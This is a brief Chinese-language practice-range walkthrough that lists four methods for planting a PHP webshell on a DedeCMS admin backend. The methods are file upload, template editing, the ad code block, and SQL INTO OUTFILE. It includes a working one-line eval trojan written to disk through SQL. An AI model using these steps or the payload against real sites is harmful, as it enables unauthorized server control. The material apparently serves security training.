打开靶场地址

姿势一：通过文件管理器上传webshell

1.登录后台

dedecms默认的后台登录地址为/dede

2.在附加管理里的文件式管理器中有文件上传

3.上传木马文件

4.访问木马文件 并连接

姿势二：修改模板文件获取webshell

1.点击模板里面的默认模板管理

找到index.html修改第一行内容为一句话木马

2.点击生成按钮里的更新主页html

修改主页位置为../index.php

首页模式改为生成静态

3.访问index.php文件 并连接

姿势三：后台任意命令执行获取webshell

1.点击模块里面的广告管理 添加一个广告

2.在代码块里写入一句话木马

3.点击管理代码

访问木马路径 并进行连接

姿势四：sql命令行工具获取webshell

1.打开系统里的sql命令行工具

2.执行sql命令写入一句话木马

select '<?php @eval($_POST[cmd]);?>' into outfile "D:/phpstudy_pro/www/111.php"

可以成功创建php木马文件

3.访问木马并进行连接